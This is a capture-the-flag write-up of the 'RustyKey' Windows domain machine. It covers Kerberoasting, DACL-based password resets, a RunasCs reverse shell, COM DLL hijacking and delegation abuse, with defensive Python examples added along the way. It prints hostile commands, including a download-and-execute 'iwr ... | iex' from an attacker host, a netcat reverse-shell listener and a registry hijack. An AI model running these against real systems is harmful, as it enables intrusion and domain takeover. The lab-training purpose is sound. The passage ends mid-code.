This Windows Hard box starts off as an assumed-breach scenario. While enumerating with the provided credentials you find that NTLM is disabled. Using those credentials you're able to obtain a Kerberos ticket that lets you take a BloodHound dump and further enumerate the machine. Once done, you're able to kerberoast SPNs (some people used timeroasting instead) and obtain some hashes, one of which cracks to a cleartext password for IT-Computer3$. Using your newfound credentials you're able to abuse DACLs that allow our user to remove objects from the Protected Objects group. That in turn makes ForceChangePassword usable, and after successfully changing the password for bb.morgan, we are able to get a Kerberos ticket, set up our krb5.conf and evil-winrm onto the box.

Enumeration as bb.morgan shows very little, but we have a user ee.reed in the Support group. After changing his password, creating a reverse shell and using RunasCs.exe, we're able to get a shell as ee.reed. Running PrivescCheck.ps1 shows us a COM server registry key we have FullAccess over. Abusing this gets us a reverse shell as mm.turner. Looking back in BloodHound we see that mm.turner is a member of the DelegationManagers group, which gives us AddAllowedToAct on the DC$ computer object. Once we set the attribute, we use Rubeus.exe and perform Resource-Based Constrained Delegation. This gets us a TGS which we can then use to secretsdump the domain.

As is common in real life Windows pentests, you will start the RustyKey box with credentials for the following account: rr.parker / 8#t5HE8L!W3A

Initial Nmap

PORT      STATE SERVICE       REASON          VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-06-29 04:15:29Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49673/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49674/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49677/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49692/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49727/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 51928/tcp): CLEAN (Couldn't connect)
| Check 2 (port 27628/tcp): CLEAN (Couldn't connect)
| Check 3 (port 63867/udp): CLEAN (Timeout)
| Check 4 (port 46581/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2025-06-29T04:16:24
|_ start_date: N/A
|_clock-skew: 0s

Many ports are open; the LDAP banner gives us the domain name, rustykey.htb.

Enum of rr.parker

With his creds I simply grabbed a TGT, since NTLM is disabled, and exported it for use.

konoha# impacket-getTGT 'rustykey.htb/rr.parker:8#t5HE8L!W3A' -dc-ip 10.10.11.75
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in rr.parker.ccache
konoha# export KRB5CCNAME=./rr.parker.ccache

SMB didn't let us authenticate, but LDAP worked, so we can get a BloodHound dump.

konoha# nxc smb 10.10.11.75 -d rustykey.htb -k --use-kcache
SMB 10.10.11.75 445 10.10.11.75 [*] x64 (name:10.10.11.75) (domain:10.10.11.75) (signing:True) (SMBv1:False) (NTLM:False)
SMB 10.10.11.75 445 10.10.11.75 [-] rustykey.htb\ from ccache KDC_ERR_S_PRINCIPAL_UNKNOWN
konoha# nxc ldap 10.10.11.75 -d rustykey.htb -k --use-kcache
LDAP 10.10.11.75 389 DC [*] None (name:DC) (domain:rustykey.htb)
LDAP 10.10.11.75 389 DC [+] rustykey.htb\rr.parker from ccache

konoha# bloodhound-python -d rustykey.htb -u 'rr.parker' -k -no-pass -ns 10.10.11.75 --zip -c Group,LocalAdmin,Session,Trusts,DCOM,RDP,PSRemote,LoggedOn,Container,ObjectProps,ACL
<SNIP>
INFO: Done in 00M 10S
INFO: Compressing output into 20250701022158_bloodhound.zip

No way out so it seemed!!

After loading up the data, we didn't find much on our user. Nevertheless, we have credentials, so we can get a list of users and try kerberoasting.

konoha# nxc ldap 10.10.11.75 -d rustykey.htb -k --use-kcache --users --computers
LDAP 10.10.11.75 389 DC [*] None (name:DC) (domain:rustykey.htb)
LDAP 10.10.11.75 389 DC [+] rustykey.htb\rr.parker from ccache
LDAP 10.10.11.75 389 DC [*] Skipping disabled account: krbtgt
LDAP 10.10.11.75 389 DC [*] Total of records returned 0
LDAP 10.10.11.75 389 DC [*] Enumerated 11 domain users: rustykey.htb
LDAP 10.10.11.75 389 DC -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.10.11.75 389 DC Administrator 2025-06-04 17:52:22 0 Built-in account for administering the computer/domain
LDAP 10.10.11.75 389 DC Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP 10.10.11.75 389 DC krbtgt 2024-12-26 18:53:40 0 Key Distribution Center Service Account
LDAP 10.10.11.75 389 DC rr.parker 2025-06-04 17:54:15 0
LDAP 10.10.11.75 389 DC mm.turner 2024-12-27 04:18:39 0
LDAP 10.10.11.75 389 DC bb.morgan 2025-07-01 02:16:40 0
LDAP 10.10.11.75 389 DC gg.anderson 2025-07-01 02:16:40 0
LDAP 10.10.11.75 389 DC dd.ali 2025-07-01 02:16:40 0
LDAP 10.10.11.75 389 DC ee.reed 2025-07-01 02:16:40 0
LDAP 10.10.11.75 389 DC nn.marcos 2024-12-27 05:34:50 0
LDAP 10.10.11.75 389 DC backupadmin 2024-12-29 18:30:18 11
LDAP 10.10.11.75 389 DC [*] Total records returned: 16
LDAP 10.10.11.75 389 DC DC$
LDAP 10.10.11.75 389 DC Support-Computer1$
LDAP 10.10.11.75 389 DC Support-Computer2$
LDAP 10.10.11.75 389 DC Support-Computer3$
LDAP 10.10.11.75 389 DC Support-Computer4$
LDAP 10.10.11.75 389 DC Support-Computer5$
LDAP 10.10.11.75 389 DC Finance-Computer1$
LDAP 10.10.11.75 389 DC Finance-Computer2$
LDAP 10.10.11.75 389 DC Finance-Computer3$
LDAP 10.10.11.75 389 DC Finance-Computer4$
LDAP 10.10.11.75 389 DC Finance-Computer5$
LDAP 10.10.11.75 389 DC IT-Computer1$
LDAP 10.10.11.75 389 DC IT-Computer2$
LDAP 10.10.11.75 389 DC IT-Computer3$
LDAP 10.10.11.75 389 DC IT-Computer4$
LDAP 10.10.11.75 389 DC IT-Computer5$

Let's make a list and try all these users and computers.

konoha# impacket-GetUserSPNs -dc-ip 10.10.11.75 'rustykey.htb/rr.parker' -usersfile user.lst -k -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[-] Principal: Administrator - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Guest - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$23$*krbtgt$RUSTYKEY.HTB$krbtgt*$172f44f5c03cb0964a08add4f0727799$<SNIP>
[-] Principal: rr.parker - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: mm.turner - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: bb.morgan - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: gg.anderson - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: dd.ali - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: ee.reed - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: nn.marcos - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: backupadmin - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$23$*DC$$RUSTYKEY.HTB$DC$*$7664306543510d4896b1e31f823a0256$<SNIP>
<SNIP>

This returns many hashes that we can try to crack offline, and one of them cracks.

konoha# hashcat HASHES --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

$krb5tgs$23$*IT-Computer3$$RUSTYKEY.HTB$IT-Computer3$*$1424a46c534b22e4a188835b00461505$8ebe6eacca6940cec84b7fd9a6<SNIP>:<SNIP>
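One thing worth noticing in that output is that several of the roastable principals are computer accounts (the names end in `$`). A machine account normally has a 120-character random password that rotates every 30 days, so a crackable hash on one means somebody set its password by hand, which is exactly what happened with IT-Computer3$. The following Python is an added example, not code from the writeup or from impacket: it parses `$krb5tgs$` lines in both the RC4 (etype 23) and AES (etype 17/18) layouts, maps each to its hashcat mode, and sorts the ones that deserve a second look (computer accounts, RC4 tickets) to the top. The sample lines are constructed in the shape of the output above; the checksums follow the page but the trailing ciphertext is a placeholder, and the svc_sql entry is invented to show the AES layout.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# hashcat modes for Kerberos 5 TGS-REP hashes, keyed by encryption type
HASHCAT_MODES = {23: 13100, 17: 19600, 18: 19700}

# RC4-HMAC (etype 23):  $krb5tgs$23$*user$REALM$spn*$checksum$edata
_RC4 = re.compile(
    r"^\$krb5tgs\$(?P<etype>23)\$\*(?P<user>[^$]+\$?)\$(?P<realm>[^$]+)\$(?P<spn>.*?)\*"
    r"\$(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)
# AES (etype 17/18):    $krb5tgs$18$user$REALM$*spn*$checksum$edata
_AES = re.compile(
    r"^\$krb5tgs\$(?P<etype>1[78])\$(?P<user>[^$]+\$?)\$(?P<realm>[^$]+)\$\*(?P<spn>.*?)\*"
    r"\$(?P<checksum>[0-9a-fA-F]{24})\$(?P<edata>[0-9a-fA-F]+)$"
)


@dataclass
class TgsHash:
    etype: int
    user: str
    realm: str
    spn: str
    checksum: str

    @property
    def is_computer(self) -> bool:
        # the sAMAccountName of a computer object always ends in '$'
        return self.user.endswith("$")

    @property
    def hashcat_mode(self) -> int:
        return HASHCAT_MODES[self.etype]

    def assessment(self) -> str:
        if self.user.lower() == "krbtgt":
            return "krbtgt: key is random, cracking is hopeless; ignore"
        if self.is_computer:
            return "computer account: password is normally 120 random chars; a crack means it was set by hand"
        if self.etype == 23:
            return "service account with RC4 ticket: fastest to crack; enforce AES and a long random password"
        return "service account with AES ticket: still crackable if the password is weak"


def parse_tgs_hash(line: str) -> Optional[TgsHash]:
    """Parse one $krb5tgs$ line; returns None for anything that is not a TGS-REP hash."""
    m = _RC4.match(line.strip()) or _AES.match(line.strip())
    if not m:
        return None
    return TgsHash(int(m["etype"]), m["user"], m["realm"], m["spn"], m["checksum"].lower())


def triage(lines: List[str]) -> List[TgsHash]:
    """Keep the parsable hashes; computer accounts first, then RC4 tickets, then the rest."""
    parsed = [h for h in (parse_tgs_hash(l) for l in lines) if h is not None]
    return sorted(parsed, key=lambda h: (not h.is_computer, h.etype != 23, h.user.lower()))


# Constructed sample lines in the shape of the GetUserSPNs/hashcat output above;
# checksums follow the page, the trailing ciphertext is a placeholder, svc_sql is invented.
SAMPLE_HASHES = [
    "$krb5tgs$23$*krbtgt$RUSTYKEY.HTB$krbtgt*$172f44f5c03cb0964a08add4f0727799$aabbccdd",
    "$krb5tgs$23$*DC$$RUSTYKEY.HTB$DC$*$7664306543510d4896b1e31f823a0256$aabbccdd",
    "$krb5tgs$23$*IT-Computer3$$RUSTYKEY.HTB$IT-Computer3$*$1424a46c534b22e4a188835b00461505$aabbccdd",
    "$krb5tgs$18$svc_sql$RUSTYKEY.HTB$*MSSQLSvc/db.rustykey.htb*$" + "00" * 12 + "$aabbccdd",
    "[-] Principal: Guest - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN",
]

if __name__ == "__main__":
    for h in triage(SAMPLE_HASHES):
        print(f"{h.user:16} etype={h.etype} mode={h.hashcat_mode} -> {h.assessment()}")
```

Feed it the raw GetUserSPNs output and it silently drops the `[-] Principal:` error lines; the assessment strings are the defender's reading of each row, and the remediation for a row like IT-Computer3$ is simply to reset the machine account password so it goes back to being random.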

We now have credentials for IT-Computer3$. Looking back at BloodHound to see what permissions this account has, there are some interesting ones, so we can start there.

From this we have the following:

  • AddSelf
    • HelpDesk
  • ForceChangePassword
    • bb.morgan
    • ee.reed
    • gg.anderson
      • GenericWrite
        • dd.ali
  • AddMember
    • Protected Objects

So we can add ourselves to the HelpDesk group and then remove the IT and Support groups from the Protected Objects group. This lets us change the passwords for these users and request TGTs for them. I created a little script that does all of this at once.

The error below says the entry already exists, because the computer had already been added to the HelpDesk group.

konoha# ./runRCE.sh
Retriving TGT
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in IT-Computer3$.ccache
Exporting Ticket
Adding Computer to Helpdesk
[+] Connection URL: ldap+kerberos-ccache://rustykey.htb\IT-Computer3%24:.%2FIT-Computer3%24.ccache@DC.rustykey.htb/?serverip=10.10.11.75&dc=10.10.11.75
[*] Trying to connect to DC.rustykey.htb...
[+] Connection successful
Traceback (most recent call last):
File "/root/.local/bin/bloodyAD", line 8, in <module>
sys.exit(main())
~~~~^^
File "/root/.local/share/pipx/venvs/bloodyad/lib/python3.13/site-packages/bloodyAD/main.py", line 210, in main
output = args.func(conn, **params)
File "/root/.local/share/pipx/venvs/bloodyad/lib/python3.13/site-packages/bloodyAD/cli_modules/add.py", line 252, in groupMember
conn.ldap.bloodymodify(group, {"member": [(Change.ADD.value, member_transformed)]})
~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/root/.local/share/pipx/venvs/bloodyad/lib/python3.13/site-packages/bloodyAD/network/ldap.py", line 301, in bloodymodify
raise err
msldap.commons.exceptions.LDAPModifyException: LDAP Modify operation failed on DN CN=HelpDesk,CN=Users,DC=rustykey,DC=htb! Result code: "entryAlreadyExists" Reason: "b'00000562: UpdErr: DSID-031A11DA, problem 6005 (ENTRY_EXISTS), data 0\n\x00'"
Removing Support and IT from Protected Objects
[+] Connection URL: ldap+kerberos-ccache://rustykey.htb\IT-Computer3%24:.%2FIT-Computer3%24.ccache@DC.rustykey.htb/?serverip=10.10.11.75&dc=10.10.11.75
[*] Trying to connect to DC.rustykey.htb...
[+] Connection successful
[-] CN=IT,CN=USERS,DC=RUSTYKEY,DC=HTB removed from CN=PROTECTED OBJECTS,CN=USERS,DC=RUSTYKEY,DC=HTB
[+] Connection URL: ldap+kerberos-ccache://rustykey.htb\IT-Computer3%24:.%2FIT-Computer3%24.ccache@DC.rustykey.htb/?serverip=10.10.11.75&dc=10.10.11.75
[*] Trying to connect to DC.rustykey.htb...
[+] Connection successful
[-] CN=SUPPORT,CN=USERS,DC=RUSTYKEY,DC=HTB removed from CN=PROTECTED OBJECTS,CN=USERS,DC=RUSTYKEY,DC=HTB
Setting Password:P@ssw0rd123! for ee.reed,bb.morgan,gg.anderson. Grab a TGT afterwards.
[+] Connection URL: ldap+kerberos-ccache://rustykey.htb\IT-Computer3%24:.%2FIT-Computer3%24.ccache@DC.rustykey.htb/?serverip=10.10.11.75&dc=10.10.11.75
[*] Trying to connect to DC.rustykey.htb...
[+] Connection successful
[+] Password changed successfully!
[+] Connection URL: ldap+kerberos-ccache://rustykey.htb\IT-Computer3%24:.%2FIT-Computer3%24.ccache@DC.rustykey.htb/?serverip=10.10.11.75&dc=10.10.11.75
[*] Trying to connect to DC.rustykey.htb...
[+] Connection successful
[+] Password changed successfully!
[+] Connection URL: ldap+kerberos-ccache://rustykey.htb\IT-Computer3%24:.%2FIT-Computer3%24.ccache@DC.rustykey.htb/?serverip=10.10.11.75&dc=10.10.11.75
[*] Trying to connect to DC.rustykey.htb...
[+] Connection successful
[+] Password changed successfully!
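From the blue-team side, that script leaves a very distinctive trail in the Security log: a computer account adds itself to a group (4728), removes two groups from a protective group (4729), and then resets three passwords within minutes (4724). The Python below is an added example, not part of the writeup or of any product: it correlates those three event types per acting account and raises three findings, a computer account performing admin actions, a removal from a sensitive group followed by resets, and a burst of resets across several accounts. The events are constructed sample records flattened to the fields a SIEM normalises from the XML (time, event ID, subject, target, group); "Protected Objects" is this box's group, "Protected Users" is the built-in one, and the timestamps mirror the `-Last PW Set-` column in the nxc output above.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Groups whose membership changes deserve correlation; "Protected Objects" is the
# custom group from this box, "Protected Users" is the built-in one.
SENSITIVE_GROUPS = {"protected objects", "protected users"}

# Windows Security event IDs used below (Audit Security Group Management / User Account Management)
EVT_MEMBER_ADDED = 4728     # member added to a security-enabled global group
EVT_MEMBER_REMOVED = 4729   # member removed from a security-enabled global group
EVT_PASSWORD_RESET = 4724   # an attempt was made to reset an account's password

# Constructed sample events; times mirror the -Last PW Set- column seen in the nxc output above.
SAMPLE_EVENTS = [
    {"time": "2025-07-01T02:10:00", "id": 4728, "subject": "IT-Computer3$", "target": "IT-Computer3$", "group": "HelpDesk"},
    {"time": "2025-07-01T02:12:00", "id": 4729, "subject": "IT-Computer3$", "target": "IT", "group": "Protected Objects"},
    {"time": "2025-07-01T02:12:05", "id": 4729, "subject": "IT-Computer3$", "target": "Support", "group": "Protected Objects"},
    {"time": "2025-07-01T02:16:40", "id": 4724, "subject": "IT-Computer3$", "target": "bb.morgan"},
    {"time": "2025-07-01T02:16:40", "id": 4724, "subject": "IT-Computer3$", "target": "ee.reed"},
    {"time": "2025-07-01T02:16:40", "id": 4724, "subject": "IT-Computer3$", "target": "gg.anderson"},
    # benign: a helpdesk user resets a single password and touches no groups
    {"time": "2025-07-01T03:00:00", "id": 4724, "subject": "nn.marcos", "target": "dd.ali"},
]

Finding = Tuple[str, str, str]  # (subject, rule, detail)


def _ts(e: Dict) -> datetime:
    return datetime.fromisoformat(e["time"])


def detect_dacl_abuse(events: List[Dict], window: timedelta = timedelta(minutes=30),
                      mass_reset_threshold: int = 3) -> List[Finding]:
    """Correlate group-membership changes and password resets per acting account."""
    by_subject: Dict[str, List[Dict]] = defaultdict(list)
    for e in sorted(events, key=_ts):
        by_subject[e["subject"]].append(e)

    findings: List[Finding] = []
    for subject, evs in by_subject.items():
        resets = [e for e in evs if e["id"] == EVT_PASSWORD_RESET]
        group_changes = [e for e in evs if e["id"] in (EVT_MEMBER_ADDED, EVT_MEMBER_REMOVED)]

        # Rule 1: a computer account administering users or groups is not normal.
        if subject.endswith("$") and (resets or group_changes):
            findings.append((subject, "computer_account_admin_action", evs[0]["time"]))

        # Rule 2: removal from a sensitive group followed by password resets inside the window.
        for r in group_changes:
            if r["id"] != EVT_MEMBER_REMOVED or r.get("group", "").lower() not in SENSITIVE_GROUPS:
                continue
            followed = sorted({p["target"] for p in resets
                               if _ts(r) <= _ts(p) <= _ts(r) + window})
            if followed:
                findings.append((subject, "sensitive_group_removal_then_reset",
                                 f"{r['target']} out of {r['group']}, then reset {', '.join(followed)}"))

        # Rule 3: resets of many distinct accounts inside one window (reported once per subject).
        for i, first in enumerate(resets):
            targets = {p["target"] for p in resets[i:] if _ts(p) <= _ts(first) + window}
            if len(targets) >= mass_reset_threshold:
                findings.append((subject, "mass_password_reset", ", ".join(sorted(targets))))
                break
    return findings


if __name__ == "__main__":
    for subject, rule, detail in detect_dacl_abuse(SAMPLE_EVENTS):
        print(f"[{rule}] {subject}: {detail}")
```

The rules deliberately key on the subject account rather than the target: the page's chain works because one low-value principal (a workstation account) does all the writes, and that is the pivot a detection should latch onto. Rule 1 alone would have caught this box at the first bloodyAD call.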

Now we can request a TGT and try to get on the box, since most of the users are in the Remote Management group. Yet if we look at the attributes set for gg.anderson, their account is disabled, and we have no way of removing that userAccountControl flag.

uSNCreated: 20637
userAccountControl: ACCOUNTDISABLE; NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD
userPrincipalName: gg.anderson@rustykey.htb

So for ee.reed and dd.ali, even getting a TGT won’t allow us to log in. The only ticket to work was bb.morgan.
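The `userAccountControl` line above is a bitmask rendered as flag names, and the KDC checks the ACCOUNTDISABLE bit before it ever looks at the password, so a reset on a disabled account buys nothing. The Python below is an added example, not from the writeup or any tool: it decodes the attribute both from the integer form stored in LDAP and from the `A; B; C` text form shown above, says what an AS-REQ with a correct password would get back, and lists the flags that weaken an account on their own. The bit values are the documented ones; the sample line is constructed to mirror gg.anderson's attribute dump.

```python
from typing import Dict, List

# userAccountControl bit flags (subset) as documented for AD user objects
UAC_FLAGS: Dict[int, str] = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x400000: "DONT_REQ_PREAUTH",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
_NAME_TO_BIT = {name: bit for bit, name in UAC_FLAGS.items()}

# Flags that weaken the account regardless of who holds the password
WEAK_FLAGS = {"PASSWD_NOTREQD", "DONT_REQ_PREAUTH", "DONT_EXPIRE_PASSWORD",
              "TRUSTED_FOR_DELEGATION", "TRUSTED_TO_AUTH_FOR_DELEGATION"}


def decode_uac(value: int) -> List[str]:
    """Integer attribute value -> flag names, in bit order."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def encode_uac(names: List[str]) -> int:
    """Flag names -> integer attribute value (the form LDAP actually stores)."""
    value = 0
    for n in names:
        value |= _NAME_TO_BIT[n]
    return value


def parse_uac_line(line: str) -> List[str]:
    """Parse the 'userAccountControl: A; B; C' form printed by bloodyAD-style tools."""
    _, _, rhs = line.partition(":")
    return [part.strip() for part in rhs.split(";") if part.strip()]


def kdc_outcome(names: List[str]) -> str:
    """What an AS-REQ with a correct password gets back from the KDC for this account."""
    if "ACCOUNTDISABLE" in names or "LOCKOUT" in names:
        return "KDC_ERR_CLIENT_REVOKED"   # no TGT is issued; resetting the password does not help
    return "AS-REP (TGT issued)"


def audit(names: List[str]) -> List[str]:
    """Flags on this account that should be questioned during a review."""
    return sorted(n for n in names if n in WEAK_FLAGS)


# Constructed input mirroring the gg.anderson attribute dump above
SAMPLE_LINE = "userAccountControl: ACCOUNTDISABLE; NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD"

if __name__ == "__main__":
    flags = parse_uac_line(SAMPLE_LINE)
    print(encode_uac(flags), decode_uac(encode_uac(flags)), kdc_outcome(flags), audit(flags))
```

The integer 66050 that the encoder produces is the value you will see in a raw LDAP query for the same account; 66048 is the common "enabled, password never expires" value, which is itself worth flagging on a human account.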

Foothold with bb.morgan

Once we have the correct krb5.conf we can get on the box. You can also use nxc to generate the krb5 file from this TGT.

konoha# nxc smb DC.rustykey.htb -d rustykey.htb -k --use-kcache --generate-krb5-file rustykey.conf
SMB DC.rustykey.htb 445 DC [*] x64 (name:DC) (domain:rustykey.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC.rustykey.htb 445 DC [+] rustykey.htb\bb.morgan from ccache
konoha# cat rustykey.conf

[libdefaults]
dns_lookup_kdc = false
dns_lookup_realm = false
default_realm = RUSTYKEY.HTB

[realms]
RUSTYKEY.HTB = {
kdc = dc.rustykey.htb
admin_server = dc.rustykey.htb
default_domain = rustykey.htb
}

[domain_realm]
.rustykey.htb = RUSTYKEY.HTB
rustykey.htb = RUSTYKEY.HTB

Once that's done we can WinRM onto the box.

Initially, our enumeration doesn't find anything other than a 7-Zip directory in Program Files; we'll come back to that and move on to the users whose passwords we can change. Looking at the users we have, ee.reed is in the Support group. We can move laterally to him and see what kind of permissions he has.

*Evil-WinRM* PS C:\programdata> .\RCs.exe ee.reed P@ssw0rd123! "C:\ProgramData\a.exe" -t 0
[*] Warning: User profile directory for user ee.reed does not exists. Use --force-profile if you want to force the creation.
[*] Warning: The logon for user 'ee.reed' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-6658a90$\Default
[+] Async process 'C:\ProgramData\a.exe' with pid 13996 created in background.
*Evil-WinRM* PS C:\programdata>

-----

konoha# rlwrap -cAr nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.75] 52766
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
rustykey\ee.reed

Shell as ee.reed

Starting with enumeration again, this time using PrivescCheck.ps1, we find a modifiable COM server registry key.

PS C:\Windows\system32> iwr http://10.10.14.7:81/PrivescCheck.ps1 -UseBasicParsing | iex
iwr http://10.10.14.7:81/PrivescCheck.ps1 -UseBasicParsing | iex
PS C:\Windows\system32> Invoke-PrivescCheck
<SNIP>
┌───────────┬────────────────────────────────────────────────────┐
│ CATEGORY  │ TA0004 - Privilege Escalation                      │
│ NAME      │ COM server registry permissions                    │
│ TYPE      │ Base                                               │
├───────────┴────────────────────────────────────────────────────┤
│ Check whether the current user has any modification rights     │
│ on a COM server in the registry. This may not necessarily      │
│ result in a privilege escalation. Further analysis is          │
│ required.                                                      │
└────────────────────────────────────────────────────────────────┘
<SNIP>
Id : 23170f69-40c1-278a-1000-000100020000
Name : 7-Zip Shell Extension
RegPath : HKLM\SOFTWARE\Classes\CLSID\{23170f69-40c1-278a-1000-000100020000}
HandlerType : InprocServer32
HandlerDataType : FilePath
HandlerData : C:\Program Files\7-Zip\7-zip.dll
ModifiablePath : HKLM\SOFTWARE\Classes\CLSID\{23170f69-40c1-278a-1000-000100020000}\InprocServer32
IdentityReference : RUSTYKEY\Support (S-1-5-21-3316070415-896458127-4139322052-1132)
Permissions : AllAccess

Funny enough, this was already visible when we had a session as bb.morgan. We have AllAccess, so we can use classic DLL hijacking: point the InprocServer32 value in the registry at our own DLL. After creating a simple DLL with msfvenom we can upload it, set up a listener and edit the value.

PS C:\Windows\system32> reg add "HKLM\SOFTWARE\Classes\CLSID\{23170f69-40c1-278a-1000-000100020000}\InprocServer32" /ve /t REG_SZ /d "C:\ProgramData\a.dll"
reg add "HKLM\SOFTWARE\Classes\CLSID\{23170f69-40c1-278a-1000-000100020000}\InprocServer32" /ve /t REG_SZ /d "C:\ProgramData\a.dll"
Value exists, overwrite(Yes/No)? Yes
The operation completed successfully.
PS C:\Windows\system32> reg query "HKLM\SOFTWARE\Classes\CLSID\{23170f69-40c1-278a-1000-000100020000}\" /ve /s
reg query "HKLM\SOFTWARE\Classes\CLSID\{23170f69-40c1-278a-1000-000100020000}\" /ve /s

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170f69-40c1-278a-1000-000100020000}
(Default) REG_SZ 7-Zip Shell Extension

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170f69-40c1-278a-1000-000100020000}\InprocServer32
(Default) REG_SZ C:\ProgramData\a.dll
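That `reg query` output is also what a defender would pull to spot the hijack after the fact: a COM in-process server whose default value points outside Program Files or System32 is a red flag on its own, before any ACL analysis. The Python below is an added example, not from the writeup or from PrivescCheck: it parses `reg query /s` text of the shape above into a key/value map and flags every `InprocServer32` default that resolves outside an allowlist of trusted directories. The allowlist and the `%SystemRoot%`/`%ProgramFiles%` expansion values are assumptions chosen for the example, and the second CLSID in the sample is invented to show a clean entry; the first reproduces the page's hijacked value. Note that this check sees only the path, not the key's DACL, so the permission side (the `RUSTYKEY\Support` AllAccess that PrivescCheck reported) still needs an ACL query.

```python
import re
from typing import Dict, List, Tuple

# Directories a COM in-process server DLL is expected to live in (constructed allowlist;
# extend it for the site's own install roots). Compared case-insensitively by prefix.
TRUSTED_DIRS = [
    r"C:\Windows\System32",
    r"C:\Windows\SysWOW64",
    r"C:\Program Files",
    r"C:\Program Files (x86)",
]
# Minimal expansion of variables commonly found in InprocServer32 values (assumed values,
# hard-coded so the check also runs on a Linux analysis box)
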